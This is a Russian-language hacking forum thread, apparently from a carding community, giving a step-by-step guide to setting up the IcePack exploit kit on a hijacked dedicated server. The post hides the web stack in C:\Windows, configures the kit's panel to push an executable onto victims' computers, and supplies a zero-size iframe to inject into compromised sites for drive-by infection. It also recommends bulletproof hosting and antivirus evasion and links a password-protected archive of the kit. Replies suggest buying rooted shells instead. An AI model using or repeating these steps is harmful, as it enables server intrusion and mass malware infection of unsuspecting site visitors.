Установка IcePacK на Дедике

Forum Library

Professional
Messages
1,168
Reputation
195
Reaction score
479
Points
83
Я долго думал , писать эту статью или нет , и вот всё таки решил написать лёгкую статейку по этой теме. Для начала скажу что опытные связководы эксплойтов ничего нового из этой статьи для себя не почерпнут , а новичками или просто людям которым это интересно думаю можно почитать

Что такое ICEPACK можно прочитать здесь .

Ну пожалуй начнём , и так допустим вы имеете дедик и желательно заброшенный , так же дедик должен иметь белый ip адрес , узнать это просто , заходим в Пуск=Выполнить-cmd.exe , далее в смd пишем:

Code:
ipconfig/all

вывод команды ipconfig должен быть таким :

Code:
C:\>ipconfig/allНастройка протокола IP для Windows Имя компьютера . . . . . . . . . : microsof-e82618 Основной DNS-суффикс . . . . . . : Тип узла. . . . . . . . . . . . . : неизвестный IP-маршрутизация включена . . . . : нет WINS-прокси включен . . . . . . . : нетПодключение по локальной сети - Ethernet адаптер: DNS-суффикс этого подключения . . : Описание . . . . . . . . . . . . : Realtek RTL8169/8110 Family GigabitEthernet NIC Физический адрес. . . . . . . . . : 00-16-17-D6-79-50 Dhcp включен. . . . . . . . . . . : да Автонастройка включена . . . . . : да IP-адрес . . . . . . . . . . . . : 61.201.88.188 Маска подсети . . . . . . . . . . : 255.255.255.0 Основной шлюз . . . . . . . . . . : 61.201.18.1 DHCP-сервер . . . . . . . . . . . : 152.16.18.1 DNS-серверы . . . . . . . . . . . : 61.201.18.1 Аренда получена . . . . . . . . . : 29 марта 2009 г. 0:57:33 Аренда истекает . . . . . . . . . : 29 марта 2009 г. 12:57:33C:\>
ip адрес закрашен и изменён , но думаю суть ясна.

097aa640adf1.png


Теперь нам будут нужны Apache+PHP+Mysql , для этого можно выбрать к примеру Vertrigo , он легок , просто в использовании и имеет всё что нам будет нужно для работы ,

Code:
[/COLOR][/SIZE]
[SIZE=3][COLOR=white]Компоненты:[/COLOR][/SIZE]
[SIZE=3][COLOR=white]Apache 2.0.63[/COLOR][/SIZE]
[SIZE=3][COLOR=white]PHP 5.2.6[/COLOR][/SIZE]
[SIZE=3][COLOR=white]MySQL 5.0.51b[/COLOR][/SIZE]
[SIZE=3][COLOR=white]SQLite 3.5.9[/COLOR][/SIZE]
[SIZE=3][COLOR=white]Smarty 2.6.19[/COLOR][/SIZE]
[SIZE=3][COLOR=white]PhpMyAdmin 2.11.7[/COLOR][/SIZE]
[SIZE=3][COLOR=white]ZendOptimizer 3.3.3[/COLOR][/SIZE]
[SIZE=3][COLOR=white]SQLiteManager 1.2.0
и всё в одном флаконе, скачаем его от сюда.
Так же хочу отметить что Vertrigo очень просто в установке , устанавливается он двумя кликами .
После того как мы скачали и установили Vertrigo .. хочу заметить , что папку для установки лучше выбрать в директории C:\Windows ... чем не заметней ,тем лучше.
После того как мы всё это проделали , ищем в интернете IcePack Platinum Edition 2007 by IDT Group я специально не размещаю ссылку на него здесь так как IcePack является вредоносным ПО , распаковываем скаченный архив и копируем содержимое папки icepack в C:\Windows\VertrigoServ\www
Далее нам нужно создать базу данных для нашего айспака , для этого в браузере прописываем ip нашего дедики , например:

Code:
http://xx.xxx.xxx.xx/phpmyadmin
появится окно авторизации , по дефолту логин root пароль vertrigo , зайдя в PhpMyadmin создаём новую базу , назовём её ice.
так , база создана , идём в директорию с icepack в папку www и правим файл config.php со следующим содержанием

PHP код:
Code:
 [/COLOR][/SIZE]
[SIZE=3][COLOR=white]<?php [/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white] [/COLOR][/SIZE]

[SIZE=3][COLOR=white]$config [/COLOR][/SIZE][SIZE=3][COLOR=white][/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]= array ( [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]'main_url' => "localhost"[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white], [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]'admin_name' => "root"[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white], [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]'admin_pass' => "vertrigo"[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white], [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]); [/COLOR][/SIZE][/LEFT]
[SIZE=3][COLOR=white] [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]?>[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white]

так же правим файл db.php


PHP код:
Code:
 [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]<?php [/COLOR][/SIZE]
[SIZE=3][COLOR=white]define ("DBHOST", "localhost"[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]define ("DBNAME", "ice"[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]define ("DBUSER", "root"[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]define ("DBPASS", "vertrigo"[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white]); [/COLOR][/SIZE]
[LEFT][SIZE=3][COLOR=white]?>[/COLOR][/SIZE][/LEFT]

[SIZE=3][COLOR=white]


Кстати советую сменить дефолтный пароль vertrigo на свой !
Теперь всё готово и приступаем к установки IcePack , в браузере пишем
http://xx.xxx.xxx.xx/install.php установка проста до безобразия

всё готово , заходим в админку IcePack

94b6db58c2f4t.jpg


всё готово , заходим в админку IcePack

368d6132e6det.jpg


Ну здесь всё тоже очень просто вкладка Main показывает общую конфигурацию.

5f4540a5f7cdt.jpg


Statistics показывает Refferals=рефералы , Observers=анализаторы , Loadings=какие браузеры были пробиты , The countries=страны , Operational systems= какие были OS
Work with FTP = позволяет работать с ftp аккаунтами , там тоже всё очень просто описывать не вижу смысла .
Самая интересная вкладка Tools , The Traffic=позволяет выбирать страны для блокировки трафика , через Adjustments выбираем файл который будет загружаться и запускаться на компьютере жертвы.
Как видите ничего сверхъестественного в настройке IcePack нет, в URL Script [] : прописываем ваш адрес http://xx.xxx.xx.xxx/ , в Name of the user [] : имя юзера админки , в The password of the user : пароль от админки , и File for loading [] : тут через обзор загружаем нужный нам файл и нажимаем Keep (cм скрин выше)
Ну и самое пожалуй основное это Code iFrame для чего он нужен я объясню в кратции , допустим вы получили доступ к какому либо ресурсу (сайт , форум и тд ) и имеет права для редактирования файла index , в индекс вставляется , iFrame код , незаметно для пользователя идёт перенаправление на наш заражённый адрес (URL) , в следствии чего на компьютер жервы загружается и запускается наш ехе файл.
Iframe код выглядет так :

Code:
<iframe src="заражённый url/index.php" width="0" height="0"></iframe>

От себя хочу сказать следующие , обычно такой софт как IcePack размещают на абузоустойчевых серверах и сам IcePack или другая связка эксплойтов не должна палиться антивирусами .
На этом думаю следует закончить , если у кого есть какие либо дополнения , милости прошу , а я наверное начинаю писать статью, как можно защититься этот такого вида угроз !
Данная статья написана с целью ознакомления и следует помнить что данные действия попадают под статьи УК.


(c) stopxakep


Несколько версии айпака: hXXp://www.sendspace.com/file/gt14rd
pass: csu

вместо Vertigo лучше использовать xampp portable - hXXp://portableapps.com/apps/development/xampp

 

Al'Capone

VIP member
Messages
301
Reputation
27
Reaction score
50
Points
28
разве он актуальный еще? его вроде 5 лет назад с пинчем распространять предлогали
 

GreenLine

Professional
Messages
170
Reputation
18
Reaction score
28
Points
28
разве он актуальный еще? его вроде 5 лет назад с пинчем распространять предлогали

ICEPACK не актуален, а вот настройка на дедике веб сервера весьма.
 

McGrath

Moderator
Messages
1,007
Reputation
135
Reaction score
188
Points
63
Не вижу смысла делать это всё на дедике. Может лучше купить шелл за 10-15 долларов (Рутованный). Настроить под себя и домен будет.
 
Top